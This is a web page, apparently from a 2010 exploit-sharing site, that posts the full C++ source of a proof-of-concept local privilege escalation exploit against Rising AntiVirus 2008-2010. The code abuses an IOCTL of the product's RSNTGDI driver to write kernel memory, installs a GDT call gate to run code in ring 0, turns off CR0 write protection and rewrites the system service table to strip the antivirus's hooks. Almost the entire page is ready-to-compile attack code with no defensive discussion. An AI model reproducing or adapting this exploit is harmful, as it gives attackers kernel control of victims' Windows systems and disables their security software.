Home » 2010 » January » 29 » Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit
5:45 AM
Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit
// Rising0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
enum { SystemModuleInformation = 11 };
typedef struct {
   ULONG   Unknown1;
   ULONG   Unknown2;
   PVOID   Base;
   ULONG   Size;
   ULONG   Flags;
   USHORT  Index;
   USHORT  NameLength;
   USHORT  LoadCount;
   USHORT  PathLength;
   CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_
ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
   ULONG   Count;
   SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
HANDLE g_RsGdiHandle = 0 ;
void __stdcall WriteKVM(PVOID Address , ULONG Value)
{
 ULONG ColorValue = Value ;
 ULONG btr ;
 ULONG ColorBuffer = 0 ;

 DeviceIoControl(g_RsGdiHandle ,
 0x83003C0B,
 &ColorValue ,
 sizeof(ULONG),
 &ColorBuffer ,
 sizeof(ULONG),
 &btr ,
 0
 );
 DeviceIoControl(g_RsGdiHandle ,
 0x83003C0B,
 &ColorValue ,
 sizeof(ULONG),
 Address ,
 sizeof(ULONG),
 &btr ,
 0
 );
 return ;
}
void AddCallGate()
{
 ULONG Gdt_Addr;
 ULONG CallGateData[0x4];
 ULONG Icount;
 __asm
 {
 push edx
 sgdt [esp-2]
 pop edx
 mov Gdt_Addr , edx
 }
 __asm
 {

 push 0xc3
 push Gdt_Addr
 call WriteKVM
 mov eax,Gdt_Addr
 mov word ptr[CallGateData],ax
 shr eax,16
 mov word ptr[CallGateData+6],ax
 mov dword ptr[CallGateData+2],0x0ec0003e8
 mov dword ptr[CallGateData+8],0x0000ffff
 mov dword ptr[CallGateData+12],0x00cf9a00
 xor eax,eax
LoopWrite:
 mov edi,dword ptr CallGateData[eax]

 push edi
 mov edi,Gdt_Addr
 add edi,0x3e0
 add edi,eax
 push edi
 mov Icount,eax
 call WriteKVM
 mov eax,Icount
 add eax , 0x4
 cmp eax,0x10
 jnz LoopWrite
 }

 return ;
}

void IntoR0(PVOID function)
{
 WORD Callgt[3];
 Callgt[0] = 0;
 Callgt[1] = 0;
 Callgt[2] = 0x3e3;
 __asm
 {
 call fword ptr[Callgt]
 mov eax,esp
 mov esp,[esp+4]
 push eax
 call function
 pop esp
 push offset ring3Ret
 retf
ring3Ret:
 nop
 }
 return ;

}
#pragma pack(1)
typedef struct _IDTR
{
 SHORT  IDTLimit;
 UINT  IDTBase;
}IDTR,
 *PIDTR,
 **PPIDTR;
#pragma pack()
ULONG g_RealSSDT = 0 ;
ULONG ServiceNum = 0 ;
ULONG OrgService [0x1000] ;
ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)
{
 ULONG Offset = Rva, Limit;
 IMAGE_SECTION_HEADER *Img;
 WORD i;

 Img = IMAGE_FIRST_SECTION(NT);

 if (Rva < Img->PointerToRawData)
 return Rva;

 for (i = 0; i < NT->FileHeader.NumberOfSections; i++)
 {
 if (Img[i].SizeOfRawData)
  Limit = Img[i].SizeOfRawData;
 else
  Limit = Img[i].Misc.VirtualSize;

 if (Rva >= Img[i].VirtualAddress &&
  Rva < (Img[i].VirtualAddress + Limit))
 {
  if (Img[i].PointerToRawData != 0)
  {
   Offset -= Img[i].VirtualAddress;
   Offset += Img[i].PointerToRawData;
  }

  return Offset;
 }
 }

 return 0;
}
#define ibaseDD *(PDWORD)&ibase
DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)
{
   PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;
   if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;
   *pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
   if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;
   *pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));
   *poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));
   if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;
   *psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));
   return TRUE;
}
typedef struct {
   WORD    offset:12;
   WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))
DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)
{
   PIMAGE_FILE_HEADER    pfh;
   PIMAGE_OPTIONAL_HEADER    poh;
   PIMAGE_SECTION_HEADER    psh;
   PIMAGE_BASE_RELOCATION    pbr;
   PIMAGE_FIXUP_ENTRY    pfe;

   DWORD    dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;
   BOOL    bFirstChunk;

   GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

   if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
       (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

       pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);
       bFirstChunk=TRUE;
       while (bFirstChunk || pbr->VirtualAddress) {
           bFirstChunk=FALSE;

           pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

           for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {
               if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
                   dwFixups++;
                   dwPointerRva=pbr->VirtualAddress+pfe->offset;
                   dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

                   if (dwPointsToRva==dwKSDT)
    {
                       if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)
     {
                           dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;
      *ImageBase = poh->ImageBase;
                           return dwKiServiceTable;
                       }
                   }

               }
           }
           *(PDWORD)&pbr+=pbr->SizeOfBlock;
       }
   }

   return 0;
}
DWORD CR0Reg ;
ULONG realssdt ;
void InKerneProc()
{
 __asm
 {
 cli
 mov eax, cr0
 mov CR0Reg,eax
 and eax,0xFFFEFFFF
 mov cr0, eax
 }
 int i;
 for (i = 0; i < (int)ServiceNum; i++)
 {
 *(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService[i];
 }
 __asm
 {
 mov eax, CR0Reg
 mov cr0, eax
 sti
 }

}
int main(int argc, char* argv[])
{
 printf("Rising AntiVirus 2008 ~ 2010 \n"
 "Local Privilege Escalation Vulnerability Proof Of Concept Exploit\n 2010-1-27\n");

    g_RsGdiHandle = CreateFile("\\\\.\\RSNTGDI" ,
 0,
 FILE_SHARE_READ | FILE_SHARE_WRITE ,
 0,
 OPEN_EXISTING , 0 , 0 );
 if (g_RsGdiHandle == INVALID_HANDLE_VALUE)
 {
 return 0 ;
 }

 SYSTEM_MODULE_INFORMATION ModuleInfo ;

 // Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

 HMODULE hlib = GetModuleHandle("ntdll.dll");
 PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");
 ULONG infosize = sizeof(ModuleInfo);

 __asm
 {
 push 0
 push infosize
 lea eax , ModuleInfo
 push eax
 push 11
 call pNtQuerySystemInformation
 }

 HMODULE KernelHandle ;
 LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

   // Load the kernel image specified
 KernelHandle = LoadLibrary(ntosname);
 if (KernelHandle == 0 )
 {
 return 0 ;
 }

 ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

 if (KeSSDT == 0 )
 {
 return 0 ;
 }
 ULONG ImageBase = 0 ;
 ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);
 if (KiSSDT == 0 )
 {
 return 0 ;
 }
 KiSSDT += (ULONG)KernelHandle;
 ServiceNum = 0x11c ;
 ULONG i ;

 for (i = 0 ; i < ServiceNum ; i ++)
 {
 OrgService[i] = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;
 }

 realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

 SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

 AddCallGate();
 IntoR0(InKerneProc);
 return 0;
}
Views: 663 | Added by: b1zz4rd | Rating: 0.0/0
Total comments: 0
Name *:
Email *:
Code *: